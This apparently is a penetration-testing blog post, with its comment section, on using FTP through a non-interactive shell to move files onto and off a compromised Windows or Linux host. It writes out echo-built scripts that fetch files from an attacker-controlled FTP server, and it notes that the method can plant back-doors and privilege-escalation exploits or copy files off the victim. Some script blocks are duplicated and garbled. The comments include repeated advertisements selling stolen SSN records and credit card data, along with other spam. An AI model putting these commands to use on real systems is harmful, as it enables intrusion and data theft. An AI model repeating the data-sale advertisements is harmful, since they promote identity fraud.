Please use this information for legitimate penetration testing purposes only.
When a system is compromised by an attacker, it is common to try to initiate a command shell so that the system can be remotely controlled; commands issued, and files uploaded/downloaded.
However, basic non-interactive shells to compromised systems can be rather tricky to use, because it is so easy to make a mistake and run an interactive program, and then loose control of your shell (and connectivity to the compromised host).
This is why I generally prefer to get an SSH or Metasploit Meterpreter session going once I have initially compromised a system. Before an attacker could do this however, they would need to upload or download files from the system, perhaps using FTP, TFTP, SSH or HTTP. Here we look specifically at FTP.
The interactive nature of the FTP console
As the FTP program provides an interactive prompt, it is not straight-forward to use it in a non-interactive shell. Once you start the FTP command, the FTP console will be stuck waiting for input it can never get.
So how can you use FTP in a non interactive shell?
In these examples our attacking system (192.168.1.64) has an FTP server running, hosting our malicious files (in this case, test.txt)
FTP in a non-interactive shell to a Windows system
For a Windows system, this is relatively easy because the Windows version of FTP supports the "-s" option.
This enables an attacker to create a script of FTP commands, and then run that script on the remote system.
The script containing the FTP commands can be put on the remote system by echoing commands to a new file on the system using the shell. This sounds complicated but is literally a question of pasting something like the following blob of commands into the shell:
echo open 192.168.1.64 21> ftp.txt
echo anonymous>> ftp.txt
echo ftp@ftp.com>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt
echo anonymous>> ftp.txt
echo ftp@ftp.com>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt
This script file can then be checked with the following command. Each line above has created a line in the script file on the remote system.
type ftp.txt
anonymous
ftp@ftp.com
bin
get test.txt
bye
This can then be executed on the remote system, like this:
ftp -s:ftp.txt
This works well and is quick and easy in a Windows shell, however, the task is slightly more complex on a Linux system.
FTP in a non-interactive shell to a Linux system
Normally the FTP command shell on Linux does not have the "-s" option, so we will need to build a shell script to execute the FTP commands. Something like this will work.
echo "#!/bin/sh" >> ftp3.sh
echo "HOST='192.168.1.64'" >> ftp3.sh
echo "USER='anonymous'" >> ftp3.sh
echo "PASSWD='blah@blah.com'" >> ftp3.sh
echo "FILE='test.txt'" >> ftp3.sh
echo "" >> ftp3.sh
echo "ftp -n \$HOST <<BLAH " >> ftp3.sh
echo "quote USER \$USER" >> ftp3.sh
echo "quote PASS \$PASSWD" >> ftp3.sh
echo "bin" >> ftp3.sh
echo "get \$FILE" >> ftp3.sh
echo "quit" >> ftp3.sh
echo "BLAH" >> ftp3.sh
echo "exit 0" >> ftp3.sh
echo "HOST='192.168.1.64'" >> ftp3.sh
echo "USER='anonymous'" >> ftp3.sh
echo "PASSWD='blah@blah.com'" >> ftp3.sh
echo "FILE='test.txt'" >> ftp3.sh
echo "" >> ftp3.sh
echo "ftp -n \$HOST <
echo "quote USER \$USER" >> ftp3.sh
echo "quote PASS \$PASSWD" >> ftp3.sh
echo "bin" >> ftp3.sh
echo "get \$FILE" >> ftp3.sh
echo "quit" >> ftp3.sh
echo "BLAH" >> ftp3.sh
echo "exit 0" >> ftp3.sh
When pasted into a non-interactive shell the above commands will produce a script file on the remote vicitm, "ftp3.sh".
HOST='192.168.1.64'
USER='anonymous'
PASSWD='blah@blah.com'
FILE='test.txt'
ftp -n $HOST <<BLAH
quote USER $USER
quote PASS $PASSWD
bin
get $FILE
quit
END_SCRIPT
exit 0
To check, and run this script, simply execute the following commands:
cat ftp3.sh
chmod 777 ftp3.sh
./ftp3.sh
...and this will use FTP to download our test file to the target system.
Using this technique it would be relatively easy to put additional files on the victim system, such as; connectivity tools, privilege-escalation exploits, back-doors, and also copy files from the victim system using the same method (with a put rather than a get).
Adding the "echo"s to your own scripts
So, say you have some commands you want to put onto the remote system as a script. It would be a bit of a pain to manually add all those "echo"s to each line, so here is an easy way to add the prepended "echo", and the appended ">> file.txt" to each line.
cat ftp2.sh | sed 's/^/echo "/' | sed 's/$/" >> ftp3.sh/' | sed 's/\$/\\\$/'> ftpecho.txt
(This command would be used on the attacking system, to prepare the blob of echo commands you want to paste into the non-interactive shell. It also helps protect the $ character which was used in the Linux script above for shell-script variables).
This comment has been removed by the author.
ReplyDeleteHey Guys !
DeleteUSA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information
**HEADERS IN LEADS**
First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term deal
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Thanks for taking time to share this post. It is really useful. Continue sharing more like this.
ReplyDeleteRegards,
Python Training in Chennai
Networking Cable Manufacturers and Suppliers
ReplyDeleteMandeep Cables are a leading wire and cable manufacturers company. That is engaged in manufacturers and suppliers of a wide range of networking cable. That are manufacturer from a high grade of raw materials and using modern technology. Call Us-91 9560718414.
I am reading your post from the beginning, it was so interesting to read & I feel thanks to you for posting such a good blog, keep updates regularly.
ReplyDeletePhp Training in Chennai | Robotics Training in Chennai.
I am reading your post from the beginning, it was so interesting to read & I feel thanks to you for posting such a good blog, keep updates regularly.
ReplyDeleteRegards,
best embedded systems training institutes in chennai | embedded systems course fees in chennai .
Whoa! I’m enjoying the template/theme of this website. It’s simple, yet effective. A lot of times it’s very hard to get that “perfect balance” between superb usability and visual appeal. I must say you’ve done a very good job with this.
ReplyDeletehealth and safety courses in chennai
Very good blog, thanks for sharing such a wonderful blog with us.
ReplyDeletePython Training Institute in Chennai
Best Python Training in Chennai
Python Training in Velachery
Angularjs Training in Chennai
AWS Training in Chennai
DevOps Training in Chennai
Very informative post. Looking for this information for a long time. Thanks for Sharing.
ReplyDeleteTableau Training in Chennai
Tableau Course in Chennai
Tableau Certification in Chennai
Tableau Training Institutes in Chennai
Tableau Certification
Tableau Training
Tableau Course
This comment has been removed by the author.
ReplyDeleteInteresting blog, it gives lots of information to me. Thanks for sharing such a nice blog.
ReplyDeleteGuest posting sites
Education
Awesome Writing. Your way of expressing things is very interesting. I have become a fan of your writing. Pls keep on writing.
ReplyDeleteSAS Analytics Training in Chennai
Clinical SAS Training in Chennai
SAS Training in Velachery
SAS Course in Velachery
SAS Training in Tambaram
SAS Course in Tambaram
SAS Training in Adyar
SAS Course in Adyar
your blog information's are really creative and It contains full of new innovative ideas.
ReplyDeletethank you for sharing with us.please update more data.
android course in bangalore with placement
Android courses in Anna Nagar
Android Certification Training in T nagar
Android Training in Sholinganallur
Amazing Post. Excellent Writing. Waiting for your future updates.
ReplyDeleteIoT courses in Chennai
IoT Courses
Internet of Things Training in Chennai
Internet of Things Training
Internet of Things Course
IoT Training in Velachery
IoT Training in Tambaram
IoT Training in OMR
best oracle training in chennai
ReplyDeleteAwesome Writing. Your way of expressing things is very interesting.
ReplyDeletewinter internship for ece students
electrical companies in hyderabad for internship
internship in indore for computer science students
free internship in chennai chennai, tamil nadu
free internship in chennai chennai, tamil nadu
internship for electrical engineering students in bangalore
internship in automobile industry
internship in chennai for mca
free ethical hacking course in chennai
paid internship in pune for computer engineering students
Excellent information. Very useful to everyone and thanks for sharing this.\
ReplyDeletecannot set headers after they are sent to the client
select * into sql server
number pattern program in python using while loop
which of the following numbers must be added to 5678 to give a reminder 35 when divided by 460?
riya sold her car for 50000
flipkart hack mod apk download
c program to print vowels in a string
the given signs signify something
two dimensional array in javascript w3schools
how to hack wifi using ubuntu
Awesome...
ReplyDeleteinternship report on python
free internship in chennai for ece students
free internship for bca
internship for computer science engineering students in india
internships in hyderabad for cse students 2018
electrical companies in hyderabad for internship
internships in chennai for cse students 2019
internships for ece students
inplant training in tcs chennai
internship at chennai
more about the blog is good but if you was seen any other blog the content should be failed to fulfill the users requests on that field,but in this blog the content will fulfill the users who related to search this field.... great work
ReplyDeleteAi & Artificial Intelligence Course in Chennai
PHP Training in Chennai
Ethical Hacking Course in Chennai Blue Prism Training in Chennai
UiPath Training in Chennai
I am very proud to read such an informative blog. i Will follow your updates in future so, please add more and more ideas.
ReplyDeleteOracle Training | Online Course | Certification in chennai | Oracle Training | Online Course | Certification in bangalore | Oracle Training | Online Course | Certification in hyderabad | Oracle Training | Online Course | Certification in pune | Oracle Training | Online Course | Certification in coimbatore
Hey Guys !
ReplyDeleteUSA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information
**HEADERS IN LEADS**
First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term deal
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
This post is so interactive and informative.keep update more information...
ReplyDeleteGerman Classes in Tambaram
German Classes in chennai
kralbet
ReplyDeletebetpark
tipobet
slot siteleri
kibris bahis siteleri
poker siteleri
bonus veren siteler
mobil ödeme bahis
betmatik
OXFAM
شركة تنظيف بالدمام rdFg1miX9H
ReplyDeleteشركة تنظيف شقق بالدمام XFGZGZ10jo
ReplyDeleteشركة مكافحة حشرات بالدمام YMd1mw6YWc
ReplyDelete